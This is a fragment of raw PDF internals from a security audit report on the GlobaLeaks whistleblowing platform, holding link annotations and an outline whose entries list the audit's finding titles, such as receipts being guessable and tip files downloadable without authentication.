/ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page21': class PDFPage 200 0 obj % Page dictionary << /Contents 363 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] /XObject << /FormXob.3504796935e9b1b0d34a034172872e63 151 0 R >> >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER165': class LinkAnnotation 201 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 153 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 157.47 645.7736 416.7813 657.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER166': class PDFDictionary 202 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/782) >> /Border [ 0 0 0 ] /Rect [ 285.2313 492.7736 387.787 504.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER167': class PDFDictionary 203 0 obj << /A << /S /URI /Type /Action /URI 
(https://docs.google.com/document/d/1P-uHM5K3Hhe_KD6YvARbRTuqjVOVj0VkI7qPO9aWFQw/edit?usp=sharing) >> /Border [ 0 0 0 ] /Rect [ 424.4841 492.7736 532.3041 504.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER168': class PDFDictionary 204 0 obj << /A << /S /URI /Type /Action /URI (https://docs.google.com/document/d/1P-uHM5K3Hhe_KD6YvARbRTuqjVOVj0VkI7qPO9aWFQw/edit?usp=sharing) >> /Border [ 0 0 0 ] /Rect [ 85.69291 480.7736 195.7229 492.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER169': class PDFDictionary 205 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/828) >> /Border [ 0 0 0 ] /Rect [ 189.6129 301.5736 324.1229 313.5736 ] /Subtype /Link /Type /Annot >> endobj % 'Page22': class PDFPage 206 0 obj % Page dictionary << /Annots [ 201 0 R 202 0 R 203 0 R 204 0 R 205 0 R ] /Contents 364 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER170': class LinkAnnotation 207 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 454.1929 642.7736 509.2029 654.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER171': class PDFDictionary 208 0 obj << /A << /S /URI /Type /Action /URI (https://tahoe-lafs.org/trac/tahoe-lafs/browser/trunk/src/allmydata/util/encodingutil.py#L192) >> /Border [ 0 0 0 ] /Rect [ 368.6872 185.8978 436.196 197.8978 ] /Subtype /Link /Type /Annot >> endobj % 'Page23': class PDFPage 209 0 obj % Page dictionary << /Annots [ 207 0 R 208 0 R ] /Contents 365 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER172': class PDFDictionary 210 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/829) >> /Border [ 0 0 0 ] /Rect [ 189.6129 
368.4076 324.1229 380.4076 ] /Subtype /Link /Type /Annot >> endobj % 'Page24': class PDFPage 211 0 obj % Page dictionary << /Annots [ 210 0 R ] /Contents 366 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER173': class LinkAnnotation 212 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 276 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 85.04206 537.7736 326.4961 549.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER174': class PDFDictionary 213 0 obj << /A << /S /URI /Type /Action /URI (http://abortz.net/papers/timingweb.pdf) >> /Border [ 0 0 0 ] /Rect [ 330.0261 465.7736 531.5294 477.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER175': class PDFDictionary 214 0 obj << /A << /S /URI /Type /Action /URI (http://abortz.net/papers/timingweb.pdf) >> /Border [ 0 0 0 ] /Rect [ 62.69291 453.7736 116.6029 465.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER176': class PDFDictionary 215 0 obj << /A << /S /URI /Type /Action /URI (https://tahoe-lafs.org/trac/tahoe-lafs/browser/trunk/src/allmydata/util/hashutil.py?annotate=blame&rev=a4a6c02ef8ae2e0edb30bb0051873ffca6af6fc0#L205) >> /Border [ 0 0 0 ] /Rect [ 62.69291 297.7736 119.3829 309.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page25': class PDFPage 216 0 obj % Page dictionary << /Annots [ 212 0 R 213 0 R 214 0 R 215 0 R ] /Contents 367 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER177': class LinkAnnotation 217 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 182.3675 678.7736 529.7412 690.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER178': class LinkAnnotation 218 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect 
[ 62.69291 666.7736 95.48291 678.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER179': class LinkAnnotation 219 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 253.3029 427.5736 308.3129 439.5736 ] /Subtype /Link /Type /Annot >> endobj % 'Page26': class PDFPage 220 0 obj % Page dictionary << /Annots [ 217 0 R 218 0 R 219 0 R ] /Contents 368 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER180': class LinkAnnotation 221 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 182.3675 678.7736 529.7412 690.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER181': class LinkAnnotation 222 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 62.69291 666.7736 95.48291 678.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER182': class LinkAnnotation 223 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 253.3029 453.5762 308.3129 465.5762 ] /Subtype /Link /Type /Annot >> endobj % 'Page27': class PDFPage 224 0 obj % Page dictionary << /Annots [ 221 0 R 222 0 R 223 0 R ] /Contents 369 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER183': class LinkAnnotation 225 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 182.3675 678.7736 529.7412 690.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER184': class LinkAnnotation 226 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 62.69291 666.7736 95.48291 678.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page28': class PDFPage 227 0 obj % Page dictionary << /Annots [ 225 0 
R 226 0 R ] /Contents 370 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER185': class LinkAnnotation 228 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 253.3029 355.5736 308.3129 367.5736 ] /Subtype /Link /Type /Annot >> endobj % 'Page29': class PDFPage 229 0 obj % Page dictionary << /Annots [ 228 0 R ] /Contents 371 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER186': class LinkAnnotation 230 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 182.3675 666.7736 529.7412 678.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER187': class LinkAnnotation 231 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 62.69291 654.7736 95.48291 666.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER188': class LinkAnnotation 232 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 253.3029 229.7777 308.3129 241.7777 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER189': class LinkAnnotation 233 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 276 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 101.96 211.7777 349.1399 223.7777 ] /Subtype /Link /Type /Annot >> endobj % 'Page30': class PDFPage 234 0 obj % Page dictionary << /Annots [ 230 0 R 231 0 R 232 0 R 233 0 R ] /Contents 372 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER190': class LinkAnnotation 235 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 458.4027 648.7736 532.4527 
660.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER191': class LinkAnnotation 236 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 62.69291 636.7736 343.3629 648.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER192': class LinkAnnotation 237 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 253.3029 502.5798 308.3129 514.5798 ] /Subtype /Link /Type /Annot >> endobj % 'Page31': class PDFPage 238 0 obj % Page dictionary << /Annots [ 235 0 R 236 0 R 237 0 R ] /Contents 373 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page32': class PDFPage 239 0 obj % Page dictionary << /Contents 374 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER193': class PDFDictionary 240 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/831) >> /Border [ 0 0 0 ] /Rect [ 189.6129 654.7736 324.1229 666.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page33': class PDFPage 241 0 obj % Page dictionary << /Annots [ 240 0 R ] /Contents 375 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER194': class PDFDictionary 242 0 obj << /A << /S /URI /Type /Action /URI (http://en.wikipedia.org/wiki/Principle_of_least_privilege) >> /Border [ 0 0 0 ] /Rect [ 495.3527 645.7736 532.1827 657.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER195': class PDFDictionary 243 0 obj << /A << /S /URI /Type /Action /URI (http://en.wikipedia.org/wiki/Principle_of_least_privilege) >> /Border [ 0 0 0 ] /Rect [ 105.6929 633.7736 179.0629 645.7736 ] /Subtype 
/Link /Type /Annot >> endobj % 'Annot.NUMBER196': class LinkAnnotation 244 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 253 0 R /XYZ 62.69291 567.0236 0 ] /Rect [ 194.0629 252.7736 282.4229 264.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page34': class PDFPage 245 0 obj % Page dictionary << /Annots [ 242 0 R 243 0 R 244 0 R ] /Contents 376 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page35': class PDFPage 246 0 obj % Page dictionary << /Contents 377 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER197': class LinkAnnotation 247 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 181 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 189.6998 696.7736 516.4627 708.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER198': class PDFDictionary 248 0 obj << /A << /S /URI /Type /Action /URI (https://en.wikipedia.org/wiki/Captcha) >> /Border [ 0 0 0 ] /Rect [ 62.69291 660.7736 115.4729 672.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER199': class LinkAnnotation 249 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 188.3757 600.7736 530.342 612.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER200': class LinkAnnotation 250 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 216 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 62.69291 588.7736 95.48291 600.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER201': class LinkAnnotation 251 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 245 0 R /XYZ 62.69291 464.5236 0 ] /Rect [ 135.3479 528.7736 218.7079 540.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER202': class PDFDictionary 252 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/672) 
>> /Border [ 0 0 0 ] /Rect [ 96.91852 183.7736 196.0697 195.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page36': class PDFPage 253 0 obj % Page dictionary << /Annots [ 247 0 R 248 0 R 249 0 R 250 0 R 251 0 R 252 0 R ] /Contents 378 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page37': class PDFPage 254 0 obj % Page dictionary << /Contents 379 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER203': class PDFDictionary 255 0 obj << /A << /S /URI /Type /Action /URI (http://check.torproject.org) >> /Border [ 0 0 0 ] /Rect [ 134.0529 738.7736 249.6629 750.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER204': class PDFDictionary 256 0 obj << /A << /S /URI /Type /Action /URI (http://docs.python.org/3/using/cmdline.html#cmdoption-R) >> /Border [ 0 0 0 ] /Rect [ 501.4527 720.7736 532.472 732.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER205': class PDFDictionary 257 0 obj << /A << /S /URI /Type /Action /URI (http://docs.python.org/3/using/cmdline.html#cmdoption-R) >> /Border [ 0 0 0 ] /Rect [ 85.69291 708.7736 155.7229 720.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER206': class PDFDictionary 258 0 obj << /A << /S /URI /Type /Action /URI (http://bugs.python.org/issue13703) >> /Border [ 0 0 0 ] /Rect [ 175.1829 708.7736 263.5729 720.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page38': class PDFPage 259 0 obj % Page dictionary << /Annots [ 255 0 R 256 0 R 257 0 R 258 0 R ] /Contents 380 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page39': class PDFPage 260 0 obj % Page dictionary << /Contents 381 0 R /MediaBox [ 0 0 
595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page40': class PDFPage 261 0 obj % Page dictionary << /Contents 382 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER207': class PDFDictionary 262 0 obj << /A << /S /URI /Type /Action /URI (http://bugs.python.org/issue13703) >> /Border [ 0 0 0 ] /Rect [ 221.7028 684.7736 376.2028 696.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER208': class PDFDictionary 263 0 obj << /A << /S /URI /Type /Action /URI (http://cyclone.io/documentation/web.html#cyclone.web.RequestHandler.check_xsrf_cookie) >> /Border [ 0 0 0 ] /Rect [ 186.3029 294.7736 235.7629 306.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Annot.NUMBER209': class PDFDictionary 264 0 obj << /A << /S /URI /Type /Action /URI (http://abortz.net/papers/timingweb.pdf) >> /Border [ 0 0 0 ] /Rect [ 190.1829 102.7736 228.5229 114.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page41': class PDFPage 265 0 obj % Page dictionary << /Annots [ 262 0 R 263 0 R 264 0 R ] /Contents 383 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER210': class PDFDictionary 266 0 obj << /A << /S /URI /Type /Action /URI (http://abortz.net/papers/timingweb.pdf) >> /Border [ 0 0 0 ] /Rect [ 335.8229 714.7736 374.1629 726.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page42': class PDFPage 267 0 obj % Page dictionary << /Annots [ 266 0 R ] /Contents 384 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER211': class LinkAnnotation 268 0 obj << /Border [ 
0 0 0 ] /Contents () /Dest [ 260 0 R /XYZ 62.69291 768.5236 0 ] /Rect [ 320.4223 684.7736 422.4457 696.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page43': class PDFPage 269 0 obj % Page dictionary << /Annots [ 268 0 R ] /Contents 385 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER212': class PDFDictionary 270 0 obj << /A << /S /URI /Type /Action /URI (https://github.com/globaleaks/GlobaLeaks/issues/604) >> /Border [ 0 0 0 ] /Rect [ 97.59915 348.7736 130.3991 360.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page44': class PDFPage 271 0 obj % Page dictionary << /Annots [ 270 0 R ] /Contents 386 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER213': class PDFDictionary 272 0 obj << /A << /S /URI /Type /Action /URI (https://media.blackhat.com/us-13/US-13-Smyth-Truncating-TLS-Connections-to-Violate-Beliefs-in-Web-Applications-WP.pdf) >> /Border [ 0 0 0 ] /Rect [ 476.4727 672.7736 529.8027 684.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page45': class PDFPage 273 0 obj % Page dictionary << /Annots [ 272 0 R ] /Contents 387 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Annot.NUMBER214': class LinkAnnotation 274 0 obj << /Border [ 0 0 0 ] /Contents () /Dest [ 181 0 R /XYZ 62.69291 767.5236 0 ] /Rect [ 200.5129 714.7736 520.0929 726.7736 ] /Subtype /Link /Type /Annot >> endobj % 'Page46': class PDFPage 275 0 obj % Page dictionary << /Annots [ 274 0 R ] /Contents 388 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 
'Page47': class PDFPage 276 0 obj % Page dictionary << /Contents 389 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page48': class PDFPage 277 0 obj % Page dictionary << /Contents 390 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'Page49': class PDFPage 278 0 obj % Page dictionary << /Contents 391 0 R /MediaBox [ 0 0 595.2756 841.8898 ] /Parent 342 0 R /Resources << /Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ] >> /Rotate 0 /Trans << >> /Type /Page >> endobj % 'R279': class PDFCatalog 279 0 obj % Document Root << /Outlines 281 0 R /PageLabels 392 0 R /PageMode /UseNone /Pages 342 0 R /Type /Catalog >> endobj % 'R280': class PDFInfo 280 0 obj << /Author () /CreationDate (D:20150223152252+00'00') /Creator (\(unspecified\)) /Keywords () /Producer (ReportLab PDF Library - www.reportlab.com) /Subject (\(unspecified\)) /Title (Report of Security Audit of GlobaLeaks) >> endobj % 'R281': class PDFOutlines 281 0 obj << /Count 70 /First 282 0 R /Last 341 0 R /Type /Outlines >> endobj % 'Outline.0': class OutlineEntryObject 282 0 obj << /Count 3 /Dest [ 137 0 R /XYZ 62.69291 765.0236 0 ] /First 283 0 R /Last 285 0 R /Next 286 0 R /Parent 281 0 R /Title (Overview) >> endobj % 'Outline.61.0': class OutlineEntryObject 283 0 obj << /Dest [ 137 0 R /XYZ 62.69291 690.0236 0 ] /Next 284 0 R /Parent 282 0 R /Title (Report Revision) >> endobj % 'Outline.61.1': class OutlineEntryObject 284 0 obj << /Dest [ 137 0 R /XYZ 62.69291 630.0236 0 ] /Next 285 0 R /Parent 282 0 R /Prev 283 0 R /Title (Audit Scope) >> endobj % 'Outline.61.2': class OutlineEntryObject 285 0 obj << /Dest [ 137 0 R /XYZ 62.69291 570.0236 0 ] /Parent 282 0 R /Prev 284 0 R /Title (Methodology and Disclosure) >> endobj % 'Outline.1': class 
OutlineEntryObject 286 0 obj << /Count 1 /Dest [ 141 0 R /XYZ 62.69291 765.0236 0 ] /First 287 0 R /Last 287 0 R /Next 288 0 R /Parent 281 0 R /Prev 282 0 R /Title (Process) >> endobj % 'Outline.62.0': class OutlineEntryObject 287 0 obj << /Dest [ 141 0 R /XYZ 62.69291 282.0236 0 ] /Parent 286 0 R /Title (Issue Investigation and Remediation) >> endobj % 'Outline.2': class OutlineEntryObject 288 0 obj << /Count 4 /Dest [ 148 0 R /XYZ 62.69291 765.0236 0 ] /First 289 0 R /Last 292 0 R /Next 293 0 R /Parent 281 0 R /Prev 286 0 R /Title (Coverage) >> endobj % 'Outline.63.0': class OutlineEntryObject 289 0 obj << /Count 2 /Dest [ 148 0 R /XYZ 62.69291 624.0236 0 ] /First 290 0 R /Last 291 0 R /Next 292 0 R /Parent 288 0 R /Title (Target Code) >> endobj % 'Outline.64.0': class OutlineEntryObject 290 0 obj << /Dest [ 148 0 R /XYZ 62.69291 594.0236 0 ] /Next 291 0 R /Parent 289 0 R /Title (Revision) >> endobj % 'Outline.64.1': class OutlineEntryObject 291 0 obj << /Dest [ 148 0 R /XYZ 62.69291 537.0236 0 ] /Parent 289 0 R /Prev 290 0 R /Title (Dependencies) >> endobj % 'Outline.63.1': class OutlineEntryObject 292 0 obj << /Dest [ 148 0 R /XYZ 62.69291 121.0236 0 ] /Parent 288 0 R /Prev 289 0 R /Title (Target Configuration) >> endobj % 'Outline.3': class OutlineEntryObject 293 0 obj << /Count 23 /Dest [ 150 0 R /XYZ 62.69291 765.0236 0 ] /First 294 0 R /Last 313 0 R /Next 317 0 R /Parent 281 0 R /Prev 288 0 R /Title (Findings) >> endobj % 'Outline.65.0': class OutlineEntryObject 294 0 obj << /Count 18 /Dest [ 150 0 R /XYZ 62.69291 732.0236 0 ] /First 295 0 R /Last 312 0 R /Next 313 0 R /Parent 293 0 R /Title (Vulnerabilities) >> endobj % 'Outline.66.0': class OutlineEntryObject 295 0 obj << /Dest [ 150 0 R /XYZ 62.69291 642.0236 0 ] /Next 296 0 R /Parent 294 0 R /Title (Issue Format) >> endobj % 'Outline.66.1': class OutlineEntryObject 296 0 obj << /Dest [ 153 0 R /XYZ 62.69291 765.0236 0 ] /Next 297 0 R /Parent 294 0 R /Prev 295 0 R /Title (Issue A. 
Plaintext is Written to Disk Before Encryption) >> endobj % 'Outline.66.2': class OutlineEntryObject 297 0 obj << /Dest [ 158 0 R /XYZ 62.69291 765.0236 0 ] /Next 298 0 R /Parent 294 0 R /Prev 296 0 R /Title (Issue B. SHA256 of Plaintext File is Saved when Encryption is Enabled) >> endobj % 'Outline.66.3': class OutlineEntryObject 298 0 obj << /Dest [ 170 0 R /XYZ 62.69291 765.0236 0 ] /Next 299 0 R /Parent 294 0 R /Prev 297 0 R /Title (Issue C. Receipts are Vulnerable to Guessing) >> endobj % 'Outline.66.4': class OutlineEntryObject 299 0 obj << /Dest [ 176 0 R /XYZ 62.69291 765.0236 0 ] /Next 300 0 R /Parent 294 0 R /Prev 298 0 R /Title (Issue D. A Receiver Can Suppress File Encryption With No Warning to Others) >> endobj % 'Outline.66.5': class OutlineEntryObject 300 0 obj << /Dest [ 181 0 R /XYZ 62.69291 765.0236 0 ] /Next 301 0 R /Parent 294 0 R /Prev 299 0 R /Title (Issue E. Parallel Requests Bypass Exponentially Increasing Login Delay) >> endobj % 'Outline.66.6': class OutlineEntryObject 301 0 obj << /Dest [ 188 0 R /XYZ 62.69291 765.0236 0 ] /Next 302 0 R /Parent 294 0 R /Prev 300 0 R /Title (Issue F. Tip Files Can Be Downloaded Without Authenticating) >> endobj % 'Outline.66.7': class OutlineEntryObject 302 0 obj << /Dest [ 195 0 R /XYZ 62.69291 765.0236 0 ] /Next 303 0 R /Parent 294 0 R /Prev 301 0 R /Title (Issue G. Unescaped Characters Put Into Content-Disposition Header) >> endobj % 'Outline.66.8': class OutlineEntryObject 303 0 obj << /Dest [ 200 0 R /XYZ 62.69291 765.0236 0 ] /Next 304 0 R /Parent 294 0 R /Prev 302 0 R /Title (Issue H. Plaintext File Kept on Server when Whistleblower Does Not Finish Submitting Tip) >> endobj % 'Outline.66.9': class OutlineEntryObject 304 0 obj << /Dest [ 209 0 R /XYZ 62.69291 765.0236 0 ] /Next 305 0 R /Parent 294 0 R /Prev 303 0 R /Title (Issue I. 
